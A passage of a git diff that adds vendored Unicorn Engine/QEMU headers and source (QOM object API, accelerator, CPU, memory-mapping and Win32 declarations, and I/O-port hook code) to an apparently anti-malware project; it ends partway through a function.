size_t size, const char *typename_); + +/** + * object_dynamic_cast: + * @obj: The object to cast. + * @typename: The @typename to cast to. + * + * This function will determine if @obj is-a @typename. @obj can refer to an + * object or an interface associated with an object. + * + * Returns: This function returns @obj on success or #NULL on failure. + */ +Object *object_dynamic_cast(struct uc_struct *uc, Object *obj, const char *typename_); + +/** + * object_dynamic_cast_assert: + * + * See object_dynamic_cast() for a description of the parameters of this + * function. The only difference in behavior is that this function asserts + * instead of returning #NULL on failure if QOM cast debugging is enabled. + * This function is not meant to be called directly, but only through + * the wrapper macro OBJECT_CHECK. + */ +Object *object_dynamic_cast_assert(struct uc_struct *uc, Object *obj, const char *typename_, + const char *file, int line, const char *func); + +/** + * object_get_class: + * @obj: A derivative of #Object + * + * Returns: The #ObjectClass of the type associated with @obj. + */ +ObjectClass *object_get_class(Object *obj); + +/** + * object_get_typename: + * @obj: A derivative of #Object. + * + * Returns: The QOM typename of @obj. + */ +const char *object_get_typename(Object *obj); + +/** + * type_register_static: + * @info: The #TypeInfo of the new type. + * + * @info and all of the strings it points to should exist for the life time + * that the type is registered. + * + * Returns: 0 on failure, the new #Type on success. + */ +Type type_register_static(struct uc_struct *uc, const TypeInfo *info); + +/** + * type_register: + * @info: The #TypeInfo of the new type + * + * Unlike type_register_static(), this call does not require @info or its + * string members to continue to exist after the call returns. + * + * Returns: 0 on failure, the new #Type on success. + */ +Type type_register(struct uc_struct *uc, const TypeInfo *info); + +/** + * object_class_dynamic_cast_assert: + * @klass: The #ObjectClass to attempt to cast. + * @typename: The QOM typename of the class to cast to. + * + * See object_class_dynamic_cast() for a description of the parameters + * of this function. The only difference in behavior is that this function + * asserts instead of returning #NULL on failure if QOM cast debugging is + * enabled. This function is not meant to be called directly, but only through + * the wrapper macros OBJECT_CLASS_CHECK and INTERFACE_CHECK. + */ +ObjectClass *object_class_dynamic_cast_assert(struct uc_struct *uc, ObjectClass *klass, + const char *typename_, + const char *file, int line, + const char *func); + +/** + * object_class_dynamic_cast: + * @klass: The #ObjectClass to attempt to cast. + * @typename: The QOM typename of the class to cast to. + * + * Returns: If @typename is a class, this function returns @klass if + * @typename is a subtype of @klass, else returns #NULL. + * + * If @typename is an interface, this function returns the interface + * definition for @klass if @klass implements it unambiguously; #NULL + * is returned if @klass does not implement the interface or if multiple + * classes or interfaces on the hierarchy leading to @klass implement + * it. (FIXME: perhaps this can be detected at type definition time?) + */ +ObjectClass *object_class_dynamic_cast(struct uc_struct *uc, ObjectClass *klass, + const char *typename_); + +/** + * object_class_get_parent: + * @klass: The class to obtain the parent for. + * + * Returns: The parent for @klass or %NULL if none. + */ +ObjectClass *object_class_get_parent(struct uc_struct *uc, ObjectClass *klass); + +/** + * object_class_get_name: + * @klass: The class to obtain the QOM typename for. + * + * Returns: The QOM typename for @klass. + */ +const char *object_class_get_name(ObjectClass *klass); + +/** + * object_class_is_abstract: + * @klass: The class to obtain the abstractness for. + * + * Returns: %true if @klass is abstract, %false otherwise. + */ +bool object_class_is_abstract(ObjectClass *klass); + +/** + * object_class_by_name: + * @typename: The QOM typename to obtain the class for. + * + * Returns: The class for @typename or %NULL if not found. + */ +ObjectClass *object_class_by_name(struct uc_struct *uc, const char *typename_); + +void object_class_foreach(struct uc_struct *uc, void (*fn)(ObjectClass *klass, void *opaque), + const char *implements_type, bool include_abstract, + void *opaque); + +/** + * object_class_get_list: + * @implements_type: The type to filter for, including its derivatives. + * @include_abstract: Whether to include abstract classes. + * + * Returns: A singly-linked list of the classes in reverse hashtable order. + */ +GSList *object_class_get_list(struct uc_struct *uc, const char *implements_type, + bool include_abstract); + +/** + * object_ref: + * @obj: the object + * + * Increase the reference count of a object. A object cannot be freed as long + * as its reference count is greater than zero. + */ +void object_ref(Object *obj); + +/** + * qdef_unref: + * @obj: the object + * + * Decrease the reference count of a object. A object cannot be freed as long + * as its reference count is greater than zero. + */ +void object_unref(struct uc_struct *uc, Object *obj); + +/** + * object_property_add: + * @obj: the object to add a property to + * @name: the name of the property. This can contain any character except for + * a forward slash. In general, you should use hyphens '-' instead of + * underscores '_' when naming properties. + * @type: the type name of the property. This namespace is pretty loosely + * defined. Sub namespaces are constructed by using a prefix and then + * to angle brackets. For instance, the type 'virtio-net-pci' in the + * 'link' namespace would be 'link'. + * @get: The getter to be called to read a property. If this is NULL, then + * the property cannot be read. + * @set: the setter to be called to write a property. If this is NULL, + * then the property cannot be written. + * @release: called when the property is removed from the object. This is + * meant to allow a property to free its opaque upon object + * destruction. This may be NULL. + * @opaque: an opaque pointer to pass to the callbacks for the property + * @errp: returns an error if this function fails + * + * Returns: The #ObjectProperty; this can be used to set the @resolve + * callback for child and link properties. + */ +ObjectProperty *object_property_add(Object *obj, const char *name, + const char *type, + ObjectPropertyAccessor *get, + ObjectPropertySetAccessor *set, + ObjectPropertyRelease *release, + void *opaque, Error **errp); + +void object_property_del(struct uc_struct *uc, Object *obj, const char *name, Error **errp); + +void object_property_del_child(struct uc_struct *uc, Object *obj, Object *child, Error **errp); + +/** + * object_property_find: + * @obj: the object + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Look up a property for an object and return its #ObjectProperty if found. + */ +ObjectProperty *object_property_find(Object *obj, const char *name, + Error **errp); + +void object_unparent(struct uc_struct *uc, Object *obj); + +/** + * object_property_get: + * @obj: the object + * @v: the visitor that will receive the property value. This should be an + * Output visitor and the data will be written with @name as the name. + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Reads a property from a object. + */ +void object_property_get(struct uc_struct *uc, Object *obj, struct Visitor *v, const char *name, + Error **errp); + +/** + * object_property_set_str: + * @value: the value to be written to the property + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Writes a string value to a property. + */ +void object_property_set_str(struct uc_struct *uc, Object *obj, const char *value, + const char *name, Error **errp); + +/** + * object_property_get_str: + * @obj: the object + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Returns: the value of the property, converted to a C string, or NULL if + * an error occurs (including when the property value is not a string). + * The caller should free the string. + */ +char *object_property_get_str(struct uc_struct *uc, Object *obj, const char *name, + Error **errp); + +/** + * object_property_set_link: + * @value: the value to be written to the property + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Writes an object's canonical path to a property. + */ +void object_property_set_link(struct uc_struct *uc, Object *obj, Object *value, + const char *name, Error **errp); + +/** + * object_property_get_link: + * @obj: the object + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Returns: the value of the property, resolved from a path to an Object, + * or NULL if an error occurs (including when the property value is not a + * string or not a valid object path). + */ +Object *object_property_get_link(struct uc_struct *uc, Object *obj, const char *name, + Error **errp); + +/** + * object_property_set_bool: + * @value: the value to be written to the property + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Writes a bool value to a property. + */ +void object_property_set_bool(struct uc_struct *uc, Object *obj, bool value, + const char *name, Error **errp); + +/** + * object_property_get_bool: + * @obj: the object + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Returns: the value of the property, converted to a boolean, or NULL if + * an error occurs (including when the property value is not a bool). + */ +bool object_property_get_bool(struct uc_struct *uc, Object *obj, const char *name, + Error **errp); + +/** + * object_property_set_int: + * @value: the value to be written to the property + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Writes an integer value to a property. + */ +void object_property_set_int(struct uc_struct *uc, Object *obj, int64_t value, + const char *name, Error **errp); + +/** + * object_property_get_int: + * @obj: the object + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Returns: the value of the property, converted to an integer, or NULL if + * an error occurs (including when the property value is not an integer). + */ +int64_t object_property_get_int(struct uc_struct *uc, Object *obj, const char *name, + Error **errp); + +/** + * object_property_set: + * @obj: the object + * @v: the visitor that will be used to write the property value. This should + * be an Input visitor and the data will be first read with @name as the + * name and then written as the property value. + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Writes a property to a object. + */ +void object_property_set(struct uc_struct *uc, Object *obj, struct Visitor *v, const char *name, + Error **errp); + +/** + * object_property_parse: + * @obj: the object + * @string: the string that will be used to parse the property value. + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Parses a string and writes the result into a property of an object. + */ +void object_property_parse(struct uc_struct *uc, Object *obj, const char *string, + const char *name, Error **errp); + +/** + * object_property_get_type: + * @obj: the object + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Returns: The type name of the property. + */ +const char *object_property_get_type(Object *obj, const char *name, + Error **errp); + +/** + * object_get_root: + * + * Returns: the root object of the composition tree + */ +Object *object_get_root(struct uc_struct *uc); + +/** + * object_get_canonical_path_component: + * + * Returns: The final component in the object's canonical path. The canonical + * path is the path within the composition tree starting from the root. + */ +gchar *object_get_canonical_path_component(Object *obj); + +/** + * object_get_canonical_path: + * + * Returns: The canonical path for a object. This is the path within the + * composition tree starting from the root. + */ +gchar *object_get_canonical_path(Object *obj); + +/** + * object_resolve_path: + * @path: the path to resolve + * @ambiguous: returns true if the path resolution failed because of an + * ambiguous match + * + * There are two types of supported paths--absolute paths and partial paths. + * + * Absolute paths are derived from the root object and can follow child<> or + * link<> properties. Since they can follow link<> properties, they can be + * arbitrarily long. Absolute paths look like absolute filenames and are + * prefixed with a leading slash. + * + * Partial paths look like relative filenames. They do not begin with a + * prefix. The matching rules for partial paths are subtle but designed to make + * specifying objects easy. At each level of the composition tree, the partial + * path is matched as an absolute path. The first match is not returned. At + * least two matches are searched for. A successful result is only returned if + * only one match is found. If more than one match is found, a flag is + * returned to indicate that the match was ambiguous. + * + * Returns: The matched object or NULL on path lookup failure. + */ +Object *object_resolve_path(struct uc_struct *uc, const char *path, bool *ambiguous); + +/** + * object_resolve_path_type: + * @path: the path to resolve + * @typename: the type to look for. + * @ambiguous: returns true if the path resolution failed because of an + * ambiguous match + * + * This is similar to object_resolve_path. However, when looking for a + * partial path only matches that implement the given type are considered. + * This restricts the search and avoids spuriously flagging matches as + * ambiguous. + * + * For both partial and absolute paths, the return value goes through + * a dynamic cast to @typename. This is important if either the link, + * or the typename itself are of interface types. + * + * Returns: The matched object or NULL on path lookup failure. + */ +Object *object_resolve_path_type(struct uc_struct *uc, const char *path, const char *typename_, + bool *ambiguous); + +/** + * object_resolve_path_component: + * @parent: the object in which to resolve the path + * @part: the component to resolve. + * + * This is similar to object_resolve_path with an absolute path, but it + * only resolves one element (@part) and takes the others from @parent. + * + * Returns: The resolved object or NULL on path lookup failure. + */ +Object *object_resolve_path_component(struct uc_struct *uc, Object *parent, const gchar *part); + +/** + * object_property_add_child: + * @obj: the object to add a property to + * @name: the name of the property + * @child: the child object + * @errp: if an error occurs, a pointer to an area to store the area + * + * Child properties form the composition tree. All objects need to be a child + * of another object. Objects can only be a child of one object. + * + * There is no way for a child to determine what its parent is. It is not + * a bidirectional relationship. This is by design. + * + * The value of a child property as a C string will be the child object's + * canonical path. It can be retrieved using object_property_get_str(). + * The child object itself can be retrieved using object_property_get_link(). + */ +void object_property_add_child(Object *obj, const char *name, + Object *child, Error **errp); + +typedef enum { + /* Unref the link pointer when the property is deleted */ + OBJ_PROP_LINK_UNREF_ON_RELEASE = 0x1, +} ObjectPropertyLinkFlags; + +/** + * object_property_allow_set_link: + * + * The default implementation of the object_property_add_link() check() + * callback function. It allows the link property to be set and never returns + * an error. + */ +void object_property_allow_set_link(Object *, const char *, + Object *, Error **); + +/** + * object_property_add_link: + * @obj: the object to add a property to + * @name: the name of the property + * @type: the qobj type of the link + * @child: a pointer to where the link object reference is stored + * @check: callback to veto setting or NULL if the property is read-only + * @flags: additional options for the link + * @errp: if an error occurs, a pointer to an area to store the area + * + * Links establish relationships between objects. Links are unidirectional + * although two links can be combined to form a bidirectional relationship + * between objects. + * + * Links form the graph in the object model. + * + * The @check() callback is invoked when + * object_property_set_link() is called and can raise an error to prevent the + * link being set. If @check is NULL, the property is read-only + * and cannot be set. + * + * Ownership of the pointer that @child points to is transferred to the + * link property. The reference count for *@child is + * managed by the property from after the function returns till the + * property is deleted with object_property_del(). If the + * @flags OBJ_PROP_LINK_UNREF_ON_RELEASE bit is set, + * the reference count is decremented when the property is deleted. + */ +void object_property_add_link(Object *obj, const char *name, + const char *type, Object **child, + void (*check)(Object *obj, const char *name, + Object *val, Error **errp), + ObjectPropertyLinkFlags flags, + Error **errp); + +/** + * object_property_add_str: + * @obj: the object to add a property to + * @name: the name of the property + * @get: the getter or NULL if the property is write-only. This function must + * return a string to be freed by g_free(). + * @set: the setter or NULL if the property is read-only + * @errp: if an error occurs, a pointer to an area to store the error + * + * Add a string property using getters/setters. This function will add a + * property of type 'string'. + */ +void object_property_add_str(Object *obj, const char *name, + char *(*get)(struct uc_struct *uc, Object *, Error **), + int (*set)(struct uc_struct *uc, Object *, const char *, Error **), + Error **errp); + +/** + * object_property_add_bool: + * @obj: the object to add a property to + * @name: the name of the property + * @get: the getter or NULL if the property is write-only. + * @set: the setter or NULL if the property is read-only + * @errp: if an error occurs, a pointer to an area to store the error + * + * Add a bool property using getters/setters. This function will add a + * property of type 'bool'. + */ +void object_property_add_bool(struct uc_struct *uc, Object *obj, const char *name, + bool (*get)(struct uc_struct *uc, Object *, Error **), + int (*set)(struct uc_struct *uc, Object *, bool, Error **), + Error **errp); + +/** + * object_property_add_uint8_ptr: + * @obj: the object to add a property to + * @name: the name of the property + * @v: pointer to value + * @errp: if an error occurs, a pointer to an area to store the error + * + * Add an integer property in memory. This function will add a + * property of type 'uint8'. + */ +void object_property_add_uint8_ptr(Object *obj, const char *name, + const uint8_t *v, Error **errp); + +/** + * object_property_add_uint16_ptr: + * @obj: the object to add a property to + * @name: the name of the property + * @v: pointer to value + * @errp: if an error occurs, a pointer to an area to store the error + * + * Add an integer property in memory. This function will add a + * property of type 'uint16'. + */ +void object_property_add_uint16_ptr(Object *obj, const char *name, + const uint16_t *v, Error **errp); + +/** + * object_property_add_uint32_ptr: + * @obj: the object to add a property to + * @name: the name of the property + * @v: pointer to value + * @errp: if an error occurs, a pointer to an area to store the error + * + * Add an integer property in memory. This function will add a + * property of type 'uint32'. + */ +void object_property_add_uint32_ptr(Object *obj, const char *name, + const uint32_t *v, Error **errp); + +/** + * object_property_add_uint64_ptr: + * @obj: the object to add a property to + * @name: the name of the property + * @v: pointer to value + * @errp: if an error occurs, a pointer to an area to store the error + * + * Add an integer property in memory. This function will add a + * property of type 'uint64'. + */ +void object_property_add_uint64_ptr(Object *obj, const char *name, + const uint64_t *v, Error **Errp); + +/** + * object_property_add_alias: + * @obj: the object to add a property to + * @name: the name of the property + * @target_obj: the object to forward property access to + * @target_name: the name of the property on the forwarded object + * @errp: if an error occurs, a pointer to an area to store the error + * + * Add an alias for a property on an object. This function will add a property + * of the same type as the forwarded property. + * + * The caller must ensure that @target_obj stays alive as long as + * this property exists. In the case of a child object or an alias on the same + * object this will be the case. For aliases to other objects the caller is + * responsible for taking a reference. + */ +void object_property_add_alias(Object *obj, const char *name, + Object *target_obj, const char *target_name, + Error **errp); + +/** + * object_property_set_description: + * @obj: the object owning the property + * @name: the name of the property + * @description: the description of the property on the object + * @errp: if an error occurs, a pointer to an area to store the error + * + * Set an object property's description. + * + */ +void object_property_set_description(Object *obj, const char *name, + const char *description, Error **errp); + +/** + * object_child_foreach: + * @obj: the object whose children will be navigated + * @fn: the iterator function to be called + * @opaque: an opaque value that will be passed to the iterator + * + * Call @fn passing each child of @obj and @opaque to it, until @fn returns + * non-zero. + * + * Returns: The last value returned by @fn, or 0 if there is no child. + */ +int object_child_foreach(Object *obj, int (*fn)(Object *child, void *opaque), + void *opaque); + +/** + * container_get: + * @root: root of the #path, e.g., object_get_root() + * @path: path to the container + * + * Return a container object whose path is @path. Create more containers + * along the path if necessary. + * + * Returns: the container object. + */ +Object *container_get(struct uc_struct *uc, Object *root, const char *path); + +void container_register_types(struct uc_struct *uc); + +void register_types_object(struct uc_struct *uc); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qom/qom-qobject.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qom/qom-qobject.h new file mode 100644 index 0000000..e22e164 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qom/qom-qobject.h @@ -0,0 +1,42 @@ +/* + * QEMU Object Model - QObject wrappers + * + * Copyright (C) 2012 Red Hat, Inc. + * + * Author: Paolo Bonzini + * + * This work is licensed under the terms of the GNU GPL, version 2 or later. + * See the COPYING file in the top-level directory. + * + */ + +#ifndef QEMU_QOM_QOBJECT_H +#define QEMU_QOM_QOBJECT_H + +#include "qom/object.h" + +/* + * object_property_get_qobject: + * @obj: the object + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Returns: the value of the property, converted to QObject, or NULL if + * an error occurs. + */ +struct QObject *object_property_get_qobject(struct uc_struct *uc, Object *obj, const char *name, + struct Error **errp); + +/** + * object_property_set_qobject: + * @obj: the object + * @ret: The value that will be written to the property. + * @name: the name of the property + * @errp: returns an error if this function fails + * + * Writes a property to a object. + */ +void object_property_set_qobject(struct uc_struct *uc, Object *obj, struct QObject *qobj, + const char *name, struct Error **errp); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/accel.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/accel.h new file mode 100644 index 0000000..3abba24 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/accel.h @@ -0,0 +1,62 @@ +/* QEMU accelerator interfaces + * + * Copyright (c) 2014 Red Hat Inc + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ +#ifndef HW_ACCEL_H +#define HW_ACCEL_H + +#include "qemu/typedefs.h" +#include "qom/object.h" + +typedef struct AccelState { + /*< private >*/ + Object parent_obj; +} AccelState; + +typedef struct AccelClass { + /*< private >*/ + ObjectClass parent_class; + /*< public >*/ + + const char *opt_name; + const char *name; + int (*available)(void); + int (*init_machine)(MachineState *ms); + bool *allowed; +} AccelClass; + +#define TYPE_ACCEL "accel" + +#define ACCEL_CLASS_SUFFIX "-" TYPE_ACCEL +#define ACCEL_CLASS_NAME(a) (a ACCEL_CLASS_SUFFIX) + +#define ACCEL_CLASS(uc, klass) \ + OBJECT_CLASS_CHECK(uc, AccelClass, (klass), TYPE_ACCEL) +#define ACCEL(uc, obj) \ + OBJECT_CHECK(uc, AccelState, (obj), TYPE_ACCEL) +#define ACCEL_GET_CLASS(uc, obj) \ + OBJECT_GET_CLASS(uc, AccelClass, (obj), TYPE_ACCEL) + +int configure_accelerator(MachineState *ms); + +void register_accel_types(struct uc_struct *uc); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/cpus.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/cpus.h new file mode 100644 index 0000000..8a55e0b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/cpus.h @@ -0,0 +1,20 @@ +#ifndef QEMU_CPUS_H +#define QEMU_CPUS_H + +struct uc_struct; + +/* cpus.c */ +int resume_all_vcpus(struct uc_struct*); +void cpu_stop_current(struct uc_struct*); + +#ifndef CONFIG_USER_ONLY +/* vl.c */ +extern int smp_cores; +extern int smp_threads; +#else +/* *-user doesn't have configurable SMP topology */ +#define smp_cores 1 +#define smp_threads 1 +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/memory_mapping.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/memory_mapping.h new file mode 100644 index 0000000..dcf3598 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/memory_mapping.h @@ -0,0 +1,83 @@ +/* + * QEMU memory mapping + * + * Copyright Fujitsu, Corp. 2011, 2012 + * + * Authors: + * Wen Congyang + * + * This work is licensed under the terms of the GNU GPL, version 2 or later. + * See the COPYING file in the top-level directory. + * + */ + +#ifndef MEMORY_MAPPING_H +#define MEMORY_MAPPING_H + +#include "qemu/queue.h" +#include "qemu/typedefs.h" + +typedef struct GuestPhysBlock { + /* visible to guest, reflects PCI hole, etc */ + hwaddr target_start; + + /* implies size */ + hwaddr target_end; + + /* points into host memory */ + uint8_t *host_addr; + + QTAILQ_ENTRY(GuestPhysBlock) next; +} GuestPhysBlock; + +/* point-in-time snapshot of guest-visible physical mappings */ +typedef struct GuestPhysBlockList { + unsigned num; + QTAILQ_HEAD(GuestPhysBlockHead, GuestPhysBlock) head; +} GuestPhysBlockList; + +/* The physical and virtual address in the memory mapping are contiguous. */ +typedef struct MemoryMapping { + hwaddr phys_addr; + target_ulong virt_addr; + ram_addr_t length; + QTAILQ_ENTRY(MemoryMapping) next; +} MemoryMapping; + +struct MemoryMappingList { + unsigned int num; + MemoryMapping *last_mapping; + QTAILQ_HEAD(, MemoryMapping) head; +}; + +/* + * add or merge the memory region [phys_addr, phys_addr + length) into the + * memory mapping's list. The region's virtual address starts with virt_addr, + * and is contiguous. The list is sorted by phys_addr. + */ +void memory_mapping_list_add_merge_sorted(MemoryMappingList *list, + hwaddr phys_addr, + hwaddr virt_addr, + ram_addr_t length); + +void memory_mapping_list_free(MemoryMappingList *list); + +void memory_mapping_list_init(MemoryMappingList *list); + +void guest_phys_blocks_free(GuestPhysBlockList *list); +void guest_phys_blocks_init(GuestPhysBlockList *list); +//void guest_phys_blocks_append(GuestPhysBlockList *list); + +void qemu_get_guest_memory_mapping(struct uc_struct *uc, + MemoryMappingList *list, + const GuestPhysBlockList *guest_phys_blocks, + Error **errp); + +/* get guest's memory mapping without do paging(virtual address is 0). */ +void qemu_get_guest_simple_memory_mapping(MemoryMappingList *list, + const GuestPhysBlockList *guest_phys_blocks); + +void memory_mapping_filter(MemoryMappingList *list, int64_t begin, + int64_t length); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/os-win32.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/os-win32.h new file mode 100644 index 0000000..7825c31 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/os-win32.h @@ -0,0 +1,96 @@ +/* + * win32 specific declarations + * + * Copyright (c) 2003-2008 Fabrice Bellard + * Copyright (c) 2010 Jes Sorensen + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +#ifndef QEMU_OS_WIN32_H +#define QEMU_OS_WIN32_H + +#include +#include +#include + +/* Workaround for older versions of MinGW. */ +#ifndef ECONNREFUSED +# define ECONNREFUSED WSAECONNREFUSED +#endif +#ifndef EINPROGRESS +# define EINPROGRESS WSAEINPROGRESS +#endif +#ifndef EHOSTUNREACH +# define EHOSTUNREACH WSAEHOSTUNREACH +#endif +#ifndef EINTR +# define EINTR WSAEINTR +#endif +#ifndef EINPROGRESS +# define EINPROGRESS WSAEINPROGRESS +#endif +#ifndef ENETUNREACH +# define ENETUNREACH WSAENETUNREACH +#endif +#ifndef ENOTCONN +# define ENOTCONN WSAENOTCONN +#endif +#ifndef EWOULDBLOCK +# define EWOULDBLOCK WSAEWOULDBLOCK +#endif + +#if defined(_WIN64) +/* On w64, setjmp is implemented by _setjmp which needs a second parameter. + * If this parameter is NULL, longjump does no stack unwinding. + * That is what we need for QEMU. Passing the value of register rsp (default) + * lets longjmp try a stack unwinding which will crash with generated code. */ + +#if defined(_MSC_VER) // MSVC + +// See qemu/include/utils/setjmp-wrapper-win32.asm for details. +extern int _setjmp_wrapper(jmp_buf); + +# undef setjmp +# define setjmp(env) _setjmp_wrapper(env) + +#else // MinGW + +// Original QEMU patch. +# undef setjmp +# define setjmp(env) _setjmp(env, NULL) +#endif + +#endif +/* QEMU uses sigsetjmp()/siglongjmp() as the portable way to specify + * "longjmp and don't touch the signal masks". Since we know that the + * savemask parameter will always be zero we can safely define these + * in terms of setjmp/longjmp on Win32. + */ +#define sigjmp_buf jmp_buf +#define sigsetjmp(env, savemask) setjmp(env) +#define siglongjmp(env, val) longjmp(env, val) + +size_t getpagesize(void); + +#if !defined(EPROTONOSUPPORT) +# define EPROTONOSUPPORT EINVAL +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/sysemu.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/sysemu.h new file mode 100644 index 0000000..e5c9329 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/sysemu/sysemu.h @@ -0,0 +1,27 @@ +#ifndef SYSEMU_H +#define SYSEMU_H +/* Misc. things related to the system emulator. */ + +#include "qemu/timer.h" +#include "qapi/error.h" + +/* vl.c */ + +struct uc_struct; + +int runstate_is_running(void); +typedef struct vm_change_state_entry VMChangeStateEntry; + +#define VMRESET_SILENT false +#define VMRESET_REPORT true + +int vm_start(struct uc_struct*); + +void qemu_system_reset_request(struct uc_struct*); +void qemu_system_shutdown_request(void); +void qemu_system_powerdown_request(void); +void qemu_system_reset(bool report); + +extern int smp_cpus; + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/ioport.c b/ai_anti_malware/unicorn/unicorn-master/qemu/ioport.c new file mode 100644 index 0000000..336b43d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/ioport.c @@ -0,0 +1,154 @@ +/* + * QEMU System Emulator + * + * Copyright (c) 2003-2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ +/* + * splitted out ioport related stuffs from vl.c. + */ + +/* Modified for Unicorn Engine by Nguyen Anh Quynh, 2015 */ + +#include "exec/ioport.h" +#include "exec/memory.h" +#include "exec/address-spaces.h" + +#include "uc_priv.h" + +//#define DEBUG_IOPORT + +#ifdef DEBUG_IOPORT +# define LOG_IOPORT(...) qemu_log_mask(CPU_LOG_IOPORT, ## __VA_ARGS__) +#else +# define LOG_IOPORT(...) do { } while (0) +#endif + +typedef struct MemoryRegionPortioList { + MemoryRegion mr; + void *portio_opaque; + MemoryRegionPortio ports[]; +} MemoryRegionPortioList; + +static uint64_t unassigned_io_read(struct uc_struct* uc, void *opaque, hwaddr addr, unsigned size) +{ + return 0-1ULL; +} + +static void unassigned_io_write(struct uc_struct* uc, void *opaque, hwaddr addr, uint64_t val, + unsigned size) +{ +} + +const MemoryRegionOps unassigned_io_ops = { + unassigned_io_read, + unassigned_io_write, + DEVICE_NATIVE_ENDIAN, +}; + +void cpu_outb(struct uc_struct *uc, pio_addr_t addr, uint8_t val) +{ + //LOG_IOPORT("outb: %04"FMT_pioaddr" %02"PRIx8"\n", addr, val); + // Unicorn: call registered OUT callbacks + struct hook *hook; + HOOK_FOREACH_VAR_DECLARE; + HOOK_FOREACH(uc, hook, UC_HOOK_INSN) { + if (hook->to_delete) + continue; + if (hook->insn == UC_X86_INS_OUT) + ((uc_cb_insn_out_t)hook->callback)(uc, addr, 1, val, hook->user_data); + } +} + +void cpu_outw(struct uc_struct *uc, pio_addr_t addr, uint16_t val) +{ + //LOG_IOPORT("outw: %04"FMT_pioaddr" %04"PRIx16"\n", addr, val); + // Unicorn: call registered OUT callbacks + struct hook *hook; + 